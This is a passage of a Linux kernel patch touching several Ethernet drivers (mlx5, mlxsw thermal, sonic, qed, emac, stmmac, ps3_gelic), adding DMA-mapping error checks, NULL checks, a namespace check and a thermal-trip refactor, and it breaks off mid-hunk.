+--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
+@@ -3518,6 +3518,18 @@ static int esw_inline_mode_to_devlink(u8 mlx5_mode, u8 *mode)
+ 	return 0;
+ }
+ 
++static bool esw_offloads_devlink_ns_eq_netdev_ns(struct devlink *devlink)
++{
++	struct net *devl_net, *netdev_net;
++	struct mlx5_eswitch *esw;
++
++	esw = mlx5_devlink_eswitch_get(devlink);
++	netdev_net = dev_net(esw->dev->mlx5e_res.uplink_netdev);
++	devl_net = devlink_net(devlink);
++
++	return net_eq(devl_net, netdev_net);
++}
++
+ int mlx5_devlink_eswitch_mode_set(struct devlink *devlink, u16 mode,
+ 				  struct netlink_ext_ack *extack)
+ {
+@@ -3532,6 +3544,13 @@ int mlx5_devlink_eswitch_mode_set(struct devlink *devlink, u16 mode,
+ 	if (esw_mode_from_devlink(mode, &mlx5_mode))
+ 		return -EINVAL;
+ 
++	if (mode == DEVLINK_ESWITCH_MODE_SWITCHDEV &&
++	    !esw_offloads_devlink_ns_eq_netdev_ns(devlink)) {
++		NL_SET_ERR_MSG_MOD(extack,
++				   "Can't change E-Switch mode to switchdev when netdev net namespace has diverged from the devlink's.");
++		return -EPERM;
++	}
++
+ 	mlx5_lag_disable_change(esw->dev);
+ 	err = mlx5_esw_try_lock(esw);
+ 	if (err < 0) {
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/core_thermal.c b/drivers/net/ethernet/mellanox/mlxsw/core_thermal.c
+index 987fe5c9d5a36..09ed6e5fa6c34 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/core_thermal.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/core_thermal.c
+@@ -36,33 +36,39 @@ enum mlxsw_thermal_trips {
+ 	MLXSW_THERMAL_TEMP_TRIP_HOT,
+ };
+ 
+-struct mlxsw_thermal_trip {
+-	int	type;
+-	int	temp;
+-	int	hyst;
++struct mlxsw_cooling_states {
+ 	int	min_state;
+ 	int	max_state;
+ };
+ 
+-static const struct mlxsw_thermal_trip default_thermal_trips[] = {
++static const struct thermal_trip default_thermal_trips[] = {
+ 	{	/* In range - 0-40% PWM */
+ 		.type		= THERMAL_TRIP_ACTIVE,
+-		.temp		= MLXSW_THERMAL_ASIC_TEMP_NORM,
+-		.hyst		= MLXSW_THERMAL_HYSTERESIS_TEMP,
+-		.min_state	= 0,
+-		.max_state	= (4 * MLXSW_THERMAL_MAX_STATE) / 10,
++		.temperature	= MLXSW_THERMAL_ASIC_TEMP_NORM,
++		.hysteresis	= MLXSW_THERMAL_HYSTERESIS_TEMP,
+ 	},
+ 	{
+ 		/* In range - 40-100% PWM */
+ 		.type		= THERMAL_TRIP_ACTIVE,
+-		.temp		= MLXSW_THERMAL_ASIC_TEMP_HIGH,
+-		.hyst		= MLXSW_THERMAL_HYSTERESIS_TEMP,
+-		.min_state	= (4 * MLXSW_THERMAL_MAX_STATE) / 10,
+-		.max_state	= MLXSW_THERMAL_MAX_STATE,
++		.temperature	= MLXSW_THERMAL_ASIC_TEMP_HIGH,
++		.hysteresis	= MLXSW_THERMAL_HYSTERESIS_TEMP,
+ 	},
+ 	{	/* Warning */
+ 		.type		= THERMAL_TRIP_HOT,
+-		.temp		= MLXSW_THERMAL_ASIC_TEMP_HOT,
++		.temperature	= MLXSW_THERMAL_ASIC_TEMP_HOT,
++	},
++};
++
++static const struct mlxsw_cooling_states default_cooling_states[] = {
++	{
++		.min_state	= 0,
++		.max_state	= (4 * MLXSW_THERMAL_MAX_STATE) / 10,
++	},
++	{
++		.min_state	= (4 * MLXSW_THERMAL_MAX_STATE) / 10,
++		.max_state	= MLXSW_THERMAL_MAX_STATE,
++	},
++	{
+ 		.min_state	= MLXSW_THERMAL_MAX_STATE,
+ 		.max_state	= MLXSW_THERMAL_MAX_STATE,
+ 	},
+@@ -78,7 +84,8 @@ struct mlxsw_thermal;
+ struct mlxsw_thermal_module {
+ 	struct mlxsw_thermal *parent;
+ 	struct thermal_zone_device *tzdev;
+-	struct mlxsw_thermal_trip trips[MLXSW_THERMAL_NUM_TRIPS];
++	struct thermal_trip trips[MLXSW_THERMAL_NUM_TRIPS];
++	struct mlxsw_cooling_states cooling_states[MLXSW_THERMAL_NUM_TRIPS];
+ 	int module; /* Module or gearbox number */
+ 	u8 slot_index;
+ };
+@@ -98,8 +105,8 @@ struct mlxsw_thermal {
+ 	struct thermal_zone_device *tzdev;
+ 	int polling_delay;
+ 	struct thermal_cooling_device *cdevs[MLXSW_MFCR_PWMS_MAX];
+-	u8 cooling_levels[MLXSW_THERMAL_MAX_STATE + 1];
+-	struct mlxsw_thermal_trip trips[MLXSW_THERMAL_NUM_TRIPS];
++	struct thermal_trip trips[MLXSW_THERMAL_NUM_TRIPS];
++	struct mlxsw_cooling_states cooling_states[MLXSW_THERMAL_NUM_TRIPS];
+ 	struct mlxsw_thermal_area line_cards[];
+ };
+ 
+@@ -136,9 +143,9 @@ static int mlxsw_get_cooling_device_idx(struct mlxsw_thermal *thermal,
+ static void
+ mlxsw_thermal_module_trips_reset(struct mlxsw_thermal_module *tz)
+ {
+-	tz->trips[MLXSW_THERMAL_TEMP_TRIP_NORM].temp = 0;
+-	tz->trips[MLXSW_THERMAL_TEMP_TRIP_HIGH].temp = 0;
+-	tz->trips[MLXSW_THERMAL_TEMP_TRIP_HOT].temp = 0;
++	tz->trips[MLXSW_THERMAL_TEMP_TRIP_NORM].temperature = 0;
++	tz->trips[MLXSW_THERMAL_TEMP_TRIP_HIGH].temperature = 0;
++	tz->trips[MLXSW_THERMAL_TEMP_TRIP_HOT].temperature = 0;
+ }
+ 
+ static int
+@@ -180,12 +187,12 @@ mlxsw_thermal_module_trips_update(struct device *dev, struct mlxsw_core *core,
+ 	 * by subtracting double hysteresis value.
+ 	 */
+ 	if (crit_temp >= MLXSW_THERMAL_MODULE_TEMP_SHIFT)
+-		tz->trips[MLXSW_THERMAL_TEMP_TRIP_NORM].temp = crit_temp -
++		tz->trips[MLXSW_THERMAL_TEMP_TRIP_NORM].temperature = crit_temp -
+ 					MLXSW_THERMAL_MODULE_TEMP_SHIFT;
+ 	else
+-		tz->trips[MLXSW_THERMAL_TEMP_TRIP_NORM].temp = crit_temp;
+-	tz->trips[MLXSW_THERMAL_TEMP_TRIP_HIGH].temp = crit_temp;
+-	tz->trips[MLXSW_THERMAL_TEMP_TRIP_HOT].temp = emerg_temp;
++		tz->trips[MLXSW_THERMAL_TEMP_TRIP_NORM].temperature = crit_temp;
++	tz->trips[MLXSW_THERMAL_TEMP_TRIP_HIGH].temperature = crit_temp;
++	tz->trips[MLXSW_THERMAL_TEMP_TRIP_HOT].temperature = emerg_temp;
+ 
+ 	return 0;
+ }
+@@ -202,11 +209,11 @@ static int mlxsw_thermal_bind(struct thermal_zone_device *tzdev,
+ 		return 0;
+ 
+ 	for (i = 0; i < MLXSW_THERMAL_NUM_TRIPS; i++) {
+-		const struct mlxsw_thermal_trip *trip = &thermal->trips[i];
++		const struct mlxsw_cooling_states *state = &thermal->cooling_states[i];
+ 
+ 		err = thermal_zone_bind_cooling_device(tzdev, i, cdev,
+-						       trip->max_state,
+-						       trip->min_state,
++						       state->max_state,
++						       state->min_state,
+ 						       THERMAL_WEIGHT_DEFAULT);
+ 		if (err < 0) {
+ 			dev_err(dev, "Failed to bind cooling device to trip %d\n", i);
+@@ -260,61 +267,6 @@ static int mlxsw_thermal_get_temp(struct thermal_zone_device *tzdev,
+ 	return 0;
+ }
+ 
+-static int mlxsw_thermal_get_trip_type(struct thermal_zone_device *tzdev,
+-				       int trip,
+-				       enum thermal_trip_type *p_type)
+-{
+-	struct mlxsw_thermal *thermal = tzdev->devdata;
+-
+-	if (trip < 0 || trip >= MLXSW_THERMAL_NUM_TRIPS)
+-		return -EINVAL;
+-
+-	*p_type = thermal->trips[trip].type;
+-	return 0;
+-}
+-
+-static int mlxsw_thermal_get_trip_temp(struct thermal_zone_device *tzdev,
+-				       int trip, int *p_temp)
+-{
+-	struct mlxsw_thermal *thermal = tzdev->devdata;
+-
+-	if (trip < 0 || trip >= MLXSW_THERMAL_NUM_TRIPS)
+-		return -EINVAL;
+-
+-	*p_temp = thermal->trips[trip].temp;
+-	return 0;
+-}
+-
+-static int mlxsw_thermal_set_trip_temp(struct thermal_zone_device *tzdev,
+-				       int trip, int temp)
+-{
+-	struct mlxsw_thermal *thermal = tzdev->devdata;
+-
+-	if (trip < 0 || trip >= MLXSW_THERMAL_NUM_TRIPS)
+-		return -EINVAL;
+-
+-	thermal->trips[trip].temp = temp;
+-	return 0;
+-}
+-
+-static int mlxsw_thermal_get_trip_hyst(struct thermal_zone_device *tzdev,
+-				       int trip, int *p_hyst)
+-{
+-	struct mlxsw_thermal *thermal = tzdev->devdata;
+-
+-	*p_hyst = thermal->trips[trip].hyst;
+-	return 0;
+-}
+-
+-static int mlxsw_thermal_set_trip_hyst(struct thermal_zone_device *tzdev,
+-				       int trip, int hyst)
+-{
+-	struct mlxsw_thermal *thermal = tzdev->devdata;
+-
+-	thermal->trips[trip].hyst = hyst;
+-	return 0;
+-}
+-
+ static struct thermal_zone_params mlxsw_thermal_params = {
+ 	.no_hwmon = true,
+ };
+@@ -323,11 +275,6 @@ static struct thermal_zone_device_ops mlxsw_thermal_ops = {
+ 	.bind = mlxsw_thermal_bind,
+ 	.unbind = mlxsw_thermal_unbind,
+ 	.get_temp = mlxsw_thermal_get_temp,
+-	.get_trip_type	= mlxsw_thermal_get_trip_type,
+-	.get_trip_temp	= mlxsw_thermal_get_trip_temp,
+-	.set_trip_temp	= mlxsw_thermal_set_trip_temp,
+-	.get_trip_hyst	= mlxsw_thermal_get_trip_hyst,
+-	.set_trip_hyst	= mlxsw_thermal_set_trip_hyst,
+ };
+ 
+ static int mlxsw_thermal_module_bind(struct thermal_zone_device *tzdev,
+@@ -342,11 +289,11 @@ static int mlxsw_thermal_module_bind(struct thermal_zone_device *tzdev,
+ 		return 0;
+ 
+ 	for (i = 0; i < MLXSW_THERMAL_NUM_TRIPS; i++) {
+-		const struct mlxsw_thermal_trip *trip = &tz->trips[i];
++		const struct mlxsw_cooling_states *state = &tz->cooling_states[i];
+ 
+ 		err = thermal_zone_bind_cooling_device(tzdev, i, cdev,
+-						       trip->max_state,
+-						       trip->min_state,
++						       state->max_state,
++						       state->min_state,
+ 						       THERMAL_WEIGHT_DEFAULT);
+ 		if (err < 0)
+ 			goto err_thermal_zone_bind_cooling_device;
+@@ -434,74 +381,10 @@ static int mlxsw_thermal_module_temp_get(struct thermal_zone_device *tzdev,
+ 	return 0;
+ }
+ 
+-static int
+-mlxsw_thermal_module_trip_type_get(struct thermal_zone_device *tzdev, int trip,
+-				   enum thermal_trip_type *p_type)
+-{
+-	struct mlxsw_thermal_module *tz = tzdev->devdata;
+-
+-	if (trip < 0 || trip >= MLXSW_THERMAL_NUM_TRIPS)
+-		return -EINVAL;
+-
+-	*p_type = tz->trips[trip].type;
+-	return 0;
+-}
+-
+-static int
+-mlxsw_thermal_module_trip_temp_get(struct thermal_zone_device *tzdev,
+-				   int trip, int *p_temp)
+-{
+-	struct mlxsw_thermal_module *tz = tzdev->devdata;
+-
+-	if (trip < 0 || trip >= MLXSW_THERMAL_NUM_TRIPS)
+-		return -EINVAL;
+-
+-	*p_temp = tz->trips[trip].temp;
+-	return 0;
+-}
+-
+-static int
+-mlxsw_thermal_module_trip_temp_set(struct thermal_zone_device *tzdev,
+-				   int trip, int temp)
+-{
+-	struct mlxsw_thermal_module *tz = tzdev->devdata;
+-
+-	if (trip < 0 || trip >= MLXSW_THERMAL_NUM_TRIPS)
+-		return -EINVAL;
+-
+-	tz->trips[trip].temp = temp;
+-	return 0;
+-}
+-
+-static int
+-mlxsw_thermal_module_trip_hyst_get(struct thermal_zone_device *tzdev, int trip,
+-				   int *p_hyst)
+-{
+-	struct mlxsw_thermal_module *tz = tzdev->devdata;
+-
+-	*p_hyst = tz->trips[trip].hyst;
+-	return 0;
+-}
+-
+-static int
+-mlxsw_thermal_module_trip_hyst_set(struct thermal_zone_device *tzdev, int trip,
+-				   int hyst)
+-{
+-	struct mlxsw_thermal_module *tz = tzdev->devdata;
+-
+-	tz->trips[trip].hyst = hyst;
+-	return 0;
+-}
+-
+ static struct thermal_zone_device_ops mlxsw_thermal_module_ops = {
+ 	.bind		= mlxsw_thermal_module_bind,
+ 	.unbind		= mlxsw_thermal_module_unbind,
+ 	.get_temp	= mlxsw_thermal_module_temp_get,
+-	.get_trip_type	= mlxsw_thermal_module_trip_type_get,
+-	.get_trip_temp	= mlxsw_thermal_module_trip_temp_get,
+-	.set_trip_temp	= mlxsw_thermal_module_trip_temp_set,
+-	.get_trip_hyst	= mlxsw_thermal_module_trip_hyst_get,
+-	.set_trip_hyst	= mlxsw_thermal_module_trip_hyst_set,
+ };
+ 
+ static int mlxsw_thermal_gearbox_temp_get(struct thermal_zone_device *tzdev,
+@@ -531,11 +414,6 @@ static struct thermal_zone_device_ops mlxsw_thermal_gearbox_ops = {
+ 	.bind		= mlxsw_thermal_module_bind,
+ 	.unbind		= mlxsw_thermal_module_unbind,
+ 	.get_temp	= mlxsw_thermal_gearbox_temp_get,
+-	.get_trip_type	= mlxsw_thermal_module_trip_type_get,
+-	.get_trip_temp	= mlxsw_thermal_module_trip_temp_get,
+-	.set_trip_temp	= mlxsw_thermal_module_trip_temp_set,
+-	.get_trip_hyst	= mlxsw_thermal_module_trip_hyst_get,
+-	.set_trip_hyst	= mlxsw_thermal_module_trip_hyst_set,
+ };
+ 
+ static int mlxsw_thermal_get_max_state(struct thermal_cooling_device *cdev,
+@@ -589,7 +467,7 @@ static int mlxsw_thermal_set_cur_state(struct thermal_cooling_device *cdev,
+ 		return idx;
+ 
+ 	/* Normalize the state to the valid speed range. */
+-	state = thermal->cooling_levels[state];
++	state = max_t(unsigned long, MLXSW_THERMAL_MIN_STATE, state);
+ 	mlxsw_reg_mfsc_pack(mfsc_pl, idx, mlxsw_state_to_duty(state));
+ 	err = mlxsw_reg_write(thermal->core, MLXSW_REG(mfsc), mfsc_pl);
+ 	if (err) {
+@@ -617,7 +495,8 @@ mlxsw_thermal_module_tz_init(struct mlxsw_thermal_module *module_tz)
+ 	else
+ 		snprintf(tz_name, sizeof(tz_name), "mlxsw-module%d",
+ 			 module_tz->module + 1);
+-	module_tz->tzdev = thermal_zone_device_register(tz_name,
++	module_tz->tzdev = thermal_zone_device_register_with_trips(tz_name,
++							module_tz->trips,
+ 							MLXSW_THERMAL_NUM_TRIPS,
+ 							MLXSW_THERMAL_TRIP_MASK,
+ 							module_tz,
+@@ -661,6 +540,8 @@ mlxsw_thermal_module_init(struct device *dev, struct mlxsw_core *core,
+ 	module_tz->parent = thermal;
+ 	memcpy(module_tz->trips, default_thermal_trips,
+ 	       sizeof(thermal->trips));
++	memcpy(module_tz->cooling_states, default_cooling_states,
++	       sizeof(thermal->cooling_states));
+ 	/* Initialize all trip point. */
+ 	mlxsw_thermal_module_trips_reset(module_tz);
+ 	/* Read module temperature and thresholds. */
+@@ -756,7 +637,8 @@ mlxsw_thermal_gearbox_tz_init(struct mlxsw_thermal_module *gearbox_tz)
+ 	else
+ 		snprintf(tz_name, sizeof(tz_name), "mlxsw-gearbox%d",
+ 			 gearbox_tz->module + 1);
+-	gearbox_tz->tzdev = thermal_zone_device_register(tz_name,
++	gearbox_tz->tzdev = thermal_zone_device_register_with_trips(tz_name,
++						gearbox_tz->trips,
+ 						MLXSW_THERMAL_NUM_TRIPS,
+ 						MLXSW_THERMAL_TRIP_MASK,
+ 						gearbox_tz,
+@@ -813,6 +695,8 @@ mlxsw_thermal_gearboxes_init(struct device *dev, struct mlxsw_core *core,
+ 		gearbox_tz = &area->tz_gearbox_arr[i];
+ 		memcpy(gearbox_tz->trips, default_thermal_trips,
+ 		       sizeof(thermal->trips));
++		memcpy(gearbox_tz->cooling_states, default_cooling_states,
++		       sizeof(thermal->cooling_states));
+ 		gearbox_tz->module = i;
+ 		gearbox_tz->parent = thermal;
+ 		gearbox_tz->slot_index = area->slot_index;
+@@ -928,6 +812,7 @@ int mlxsw_thermal_init(struct mlxsw_core *core,
+ 	thermal->core = core;
+ 	thermal->bus_info = bus_info;
+ 	memcpy(thermal->trips, default_thermal_trips, sizeof(thermal->trips));
++	memcpy(thermal->cooling_states, default_cooling_states, sizeof(thermal->cooling_states));
+ 	thermal->line_cards[0].slot_index = 0;
+ 
+ 	err = mlxsw_reg_query(thermal->core, MLXSW_REG(mfcr), mfcr_pl);
+@@ -973,15 +858,12 @@ int mlxsw_thermal_init(struct mlxsw_core *core,
+ 		}
+ 	}
+ 
+-	/* Initialize cooling levels per PWM state. */
+-	for (i = 0; i < MLXSW_THERMAL_MAX_STATE; i++)
+-		thermal->cooling_levels[i] = max(MLXSW_THERMAL_MIN_STATE, i);
+-
+ 	thermal->polling_delay = bus_info->low_frequency ?
+ 				 MLXSW_THERMAL_SLOW_POLL_INT :
+ 				 MLXSW_THERMAL_POLL_INT;
+ 
+-	thermal->tzdev = thermal_zone_device_register("mlxsw",
++	thermal->tzdev = thermal_zone_device_register_with_trips("mlxsw",
++						      thermal->trips,
+ 						      MLXSW_THERMAL_NUM_TRIPS,
+ 						      MLXSW_THERMAL_TRIP_MASK,
+ 						      thermal,
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/spectrum_fid.c b/drivers/net/ethernet/mellanox/mlxsw/spectrum_fid.c
+index 045a24cacfa51..b6ee2d658b0c4 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/spectrum_fid.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/spectrum_fid.c
+@@ -1354,7 +1354,7 @@ static int mlxsw_sp_fid_8021q_port_vid_map(struct mlxsw_sp_fid *fid,
+ 					   u16 vid)
+ {
+ 	struct mlxsw_sp *mlxsw_sp = mlxsw_sp_port->mlxsw_sp;
+-	u8 local_port = mlxsw_sp_port->local_port;
++	u16 local_port = mlxsw_sp_port->local_port;
+ 	int err;
+ 
+ 	/* In case there are no {Port, VID} => FID mappings on the port,
+@@ -1391,7 +1391,7 @@ mlxsw_sp_fid_8021q_port_vid_unmap(struct mlxsw_sp_fid *fid,
+ 				  struct mlxsw_sp_port *mlxsw_sp_port, u16 vid)
+ {
+ 	struct mlxsw_sp *mlxsw_sp = mlxsw_sp_port->mlxsw_sp;
+-	u8 local_port = mlxsw_sp_port->local_port;
++	u16 local_port = mlxsw_sp_port->local_port;
+ 
+ 	mlxsw_sp_fid_port_vid_list_del(fid, mlxsw_sp_port->local_port, vid);
+ 	mlxsw_sp_fid_evid_map(fid, local_port, vid, false);
+diff --git a/drivers/net/ethernet/mscc/ocelot_stats.c b/drivers/net/ethernet/mscc/ocelot_stats.c
+index 1478c3b21af15..cb196775489e2 100644
+--- a/drivers/net/ethernet/mscc/ocelot_stats.c
++++ b/drivers/net/ethernet/mscc/ocelot_stats.c
+@@ -611,7 +611,8 @@ static int ocelot_prepare_stats_regions(struct ocelot *ocelot)
+ 		if (!ocelot_stats_layout[i].reg)
+ 			continue;
+ 
+-		if (region && ocelot_stats_layout[i].reg == last + 4) {
++		if (region && ocelot->map[SYS][ocelot_stats_layout[i].reg & REG_MASK] ==
++		    ocelot->map[SYS][last & REG_MASK] + 4) {
+ 			region->count++;
+ 		} else {
+ 			region = devm_kzalloc(ocelot->dev, sizeof(*region),
+diff --git a/drivers/net/ethernet/natsemi/sonic.c b/drivers/net/ethernet/natsemi/sonic.c
+index d17d1b4f2585f..825356ee3492e 100644
+--- a/drivers/net/ethernet/natsemi/sonic.c
++++ b/drivers/net/ethernet/natsemi/sonic.c
+@@ -292,7 +292,7 @@ static int sonic_send_packet(struct sk_buff *skb, struct net_device *dev)
+ 	 */
+ 
+ 	laddr = dma_map_single(lp->device, skb->data, length, DMA_TO_DEVICE);
+-	if (!laddr) {
++	if (dma_mapping_error(lp->device, laddr)) {
+ 		pr_err_ratelimited("%s: failed to map tx DMA buffer.\n", dev->name);
+ 		dev_kfree_skb_any(skb);
+ 		return NETDEV_TX_OK;
+@@ -509,7 +509,7 @@ static bool sonic_alloc_rb(struct net_device *dev, struct sonic_local *lp,
+ 
+ 	*new_addr = dma_map_single(lp->device, skb_put(*new_skb, SONIC_RBSIZE),
+ 				   SONIC_RBSIZE, DMA_FROM_DEVICE);
+-	if (!*new_addr) {
++	if (dma_mapping_error(lp->device, *new_addr)) {
+ 		dev_kfree_skb(*new_skb);
+ 		*new_skb = NULL;
+ 		return false;
+diff --git a/drivers/net/ethernet/qlogic/qed/qed_sriov.c b/drivers/net/ethernet/qlogic/qed/qed_sriov.c
+index 0848b5529d48a..911509c2b17d5 100644
+--- a/drivers/net/ethernet/qlogic/qed/qed_sriov.c
++++ b/drivers/net/ethernet/qlogic/qed/qed_sriov.c
+@@ -4404,6 +4404,9 @@ qed_iov_configure_min_tx_rate(struct qed_dev *cdev, int vfid, u32 rate)
+ 	}
+ 
+ 	vf = qed_iov_get_vf_info(QED_LEADING_HWFN(cdev), (u16)vfid, true);
++	if (!vf)
++		return -EINVAL;
++
+ 	vport_id = vf->vport_id;
+ 
+ 	return qed_configure_vport_wfq(cdev, vport_id, rate);
+@@ -5152,7 +5155,7 @@ static void qed_iov_handle_trust_change(struct qed_hwfn *hwfn)
+ 
+ 		/* Validate that the VF has a configured vport */
+ 		vf = qed_iov_get_vf_info(hwfn, i, true);
+-		if (!vf->vport_instance)
++		if (!vf || !vf->vport_instance)
+ 			continue;
+ 
+ 		memset(&params, 0, sizeof(params));
+diff --git a/drivers/net/ethernet/qualcomm/emac/emac.c b/drivers/net/ethernet/qualcomm/emac/emac.c
+index 3115b2c128980..eaa50050aa0b7 100644
+--- a/drivers/net/ethernet/qualcomm/emac/emac.c
++++ b/drivers/net/ethernet/qualcomm/emac/emac.c
+@@ -724,9 +724,15 @@ static int emac_remove(struct platform_device *pdev)
+ 	struct net_device *netdev = dev_get_drvdata(&pdev->dev);
+ 	struct emac_adapter *adpt = netdev_priv(netdev);
+ 
++	netif_carrier_off(netdev);
++	netif_tx_disable(netdev);
++
+ 	unregister_netdev(netdev);
+ 	netif_napi_del(&adpt->rx_q.napi);
+ 
++	free_irq(adpt->irq.irq, &adpt->irq);
++	cancel_work_sync(&adpt->work_thread);
++
+ 	emac_clks_teardown(adpt);
+ 
+ 	put_device(&adpt->phydev->mdio.dev);
+diff --git a/drivers/net/ethernet/stmicro/stmmac/common.h b/drivers/net/ethernet/stmicro/stmmac/common.h
+index 6b5d96bced475..ec9c130276d89 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/common.h
++++ b/drivers/net/ethernet/stmicro/stmmac/common.h
+@@ -418,6 +418,7 @@ struct dma_features {
+ 	unsigned int frpbs;
+ 	unsigned int frpes;
+ 	unsigned int addr64;
++	unsigned int host_dma_width;
+ 	unsigned int rssen;
+ 	unsigned int vlhash;
+ 	unsigned int sphen;
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac-imx.c b/drivers/net/ethernet/stmicro/stmmac/dwmac-imx.c
+index bd52fb7cf4860..0d6a84199fd8a 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac-imx.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac-imx.c
+@@ -251,7 +251,7 @@ static int imx_dwmac_probe(struct platform_device *pdev)
+ 		goto err_parse_dt;
+ 	}
+ 
+-	plat_dat->addr64 = dwmac->ops->addr_width;
++	plat_dat->host_dma_width = dwmac->ops->addr_width;
+ 	plat_dat->init = imx_dwmac_init;
+ 	plat_dat->exit = imx_dwmac_exit;
+ 	plat_dat->clks_config = imx_dwmac_clks_config;
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac-intel.c b/drivers/net/ethernet/stmicro/stmmac/dwmac-intel.c
+index 7deb1f817dacc..13aa919633b47 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac-intel.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac-intel.c
+@@ -684,7 +684,7 @@ static int ehl_pse0_common_data(struct pci_dev *pdev,
+ 
+ 	intel_priv->is_pse = true;
+ 	plat->bus_id = 2;
+-	plat->addr64 = 32;
++	plat->host_dma_width = 32;
+ 
+ 	plat->clk_ptp_rate = 200000000;
+ 
+@@ -725,7 +725,7 @@ static int ehl_pse1_common_data(struct pci_dev *pdev,
+ 
+ 	intel_priv->is_pse = true;
+ 	plat->bus_id = 3;
+-	plat->addr64 = 32;
++	plat->host_dma_width = 32;
+ 
+ 	plat->clk_ptp_rate = 200000000;
+ 
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac-mediatek.c b/drivers/net/ethernet/stmicro/stmmac/dwmac-mediatek.c
+index 2f7d8e4561d92..9ae31e3dc8218 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac-mediatek.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac-mediatek.c
+@@ -591,7 +591,7 @@ static int mediatek_dwmac_common_data(struct platform_device *pdev,
+ 	plat->use_phy_wol = priv_plat->mac_wol ? 0 : 1;
+ 	plat->riwt_off = 1;
+ 	plat->maxmtu = ETH_DATA_LEN;
+-	plat->addr64 = priv_plat->variant->dma_bit_mask;
++	plat->host_dma_width = priv_plat->variant->dma_bit_mask;
+ 	plat->bsp_priv = priv_plat;
+ 	plat->init = mediatek_dwmac_init;
+ 	plat->clks_config = mediatek_dwmac_clks_config;
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+index 01f7e19a2ca8b..7389718b4797b 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+@@ -1431,7 +1431,7 @@ static int stmmac_init_rx_buffers(struct stmmac_priv *priv,
+ 	struct stmmac_rx_buffer *buf = &rx_q->buf_pool[i];
+ 	gfp_t gfp = (GFP_ATOMIC | __GFP_NOWARN);
+ 
+-	if (priv->dma_cap.addr64 <= 32)
++	if (priv->dma_cap.host_dma_width <= 32)
+ 		gfp |= GFP_DMA32;
+ 
+ 	if (!buf->page) {
+@@ -4587,7 +4587,7 @@ static inline void stmmac_rx_refill(struct stmmac_priv *priv, u32 queue)
+ 	unsigned int entry = rx_q->dirty_rx;
+ 	gfp_t gfp = (GFP_ATOMIC | __GFP_NOWARN);
+ 
+-	if (priv->dma_cap.addr64 <= 32)
++	if (priv->dma_cap.host_dma_width <= 32)
+ 		gfp |= GFP_DMA32;
+ 
+ 	while (dirty-- > 0) {
+@@ -6203,7 +6203,7 @@ static int stmmac_dma_cap_show(struct seq_file *seq, void *v)
+ 	seq_printf(seq, "\tFlexible RX Parser: %s\n",
+ 		   priv->dma_cap.frpsel ? "Y" : "N");
+ 	seq_printf(seq, "\tEnhanced Addressing: %d\n",
+-		   priv->dma_cap.addr64);
++		   priv->dma_cap.host_dma_width);
+ 	seq_printf(seq, "\tReceive Side Scaling: %s\n",
+ 		   priv->dma_cap.rssen ? "Y" : "N");
+ 	seq_printf(seq, "\tVLAN Hash Filtering: %s\n",
+@@ -7173,20 +7173,22 @@ int stmmac_dvr_probe(struct device *device,
+ 		dev_info(priv->device, "SPH feature enabled\n");
+ 	}
+ 
+-	/* The current IP register MAC_HW_Feature1[ADDR64] only define
+-	 * 32/40/64 bit width, but some SOC support others like i.MX8MP
+-	 * support 34 bits but it map to 40 bits width in MAC_HW_Feature1[ADDR64].
+-	 * So overwrite dma_cap.addr64 according to HW real design.
++	/* Ideally the host DMA address width is the same as the
++	 * device's. However, it may differ, in which case we must use
++	 * the host DMA width for allocation and the device DMA width
++	 * for register handling.
+ 	 */
+-	if (priv->plat->addr64)
+-		priv->dma_cap.addr64 = priv->plat->addr64;
++	if (priv->plat->host_dma_width)
++		priv->dma_cap.host_dma_width = priv->plat->host_dma_width;
++	else
++		priv->dma_cap.host_dma_width = priv->dma_cap.addr64;
+ 
+-	if (priv->dma_cap.addr64) {
++	if (priv->dma_cap.host_dma_width) {
+ 		ret = dma_set_mask_and_coherent(device,
+-				DMA_BIT_MASK(priv->dma_cap.addr64));
++				DMA_BIT_MASK(priv->dma_cap.host_dma_width));
+ 		if (!ret) {
+-			dev_info(priv->device, "Using %d bits DMA width\n",
+-				 priv->dma_cap.addr64);
++			dev_info(priv->device, "Using %d/%d bits DMA host/device width\n",
++				 priv->dma_cap.host_dma_width, priv->dma_cap.addr64);
+ 
+ 			/*
+ 			 * If more than 32 bits can be addressed, make sure to
+@@ -7201,7 +7203,7 @@ int stmmac_dvr_probe(struct device *device,
+ 				goto error_hw_init;
+ 			}
+ 
+-			priv->dma_cap.addr64 = 32;
++			priv->dma_cap.host_dma_width = 32;
+ 		}
+ 	}
+ 
+diff --git a/drivers/net/ethernet/toshiba/ps3_gelic_net.c b/drivers/net/ethernet/toshiba/ps3_gelic_net.c
+index cf8de8a7a8a1e..9d535ae596266 100644
+--- a/drivers/net/ethernet/toshiba/ps3_gelic_net.c
++++ b/drivers/net/ethernet/toshiba/ps3_gelic_net.c
+@@ -317,15 +317,17 @@ static int gelic_card_init_chain(struct gelic_card *card,
+ 
+ 	/* set up the hardware pointers in each descriptor */
+ 	for (i = 0; i < no; i++, descr++) {
++		dma_addr_t cpu_addr;
++
+ 		gelic_descr_set_status(descr, GELIC_DESCR_DMA_NOT_IN_USE);
+-		descr->bus_addr =
+-			dma_map_single(ctodev(card), descr,
+-				       GELIC_DESCR_SIZE,
+-				       DMA_BIDIRECTIONAL);
+ 
+-		if (!descr->bus_addr)
++		cpu_addr = dma_map_single(ctodev(card), descr,
++					  GELIC_DESCR_SIZE, DMA_BIDIRECTIONAL);
++
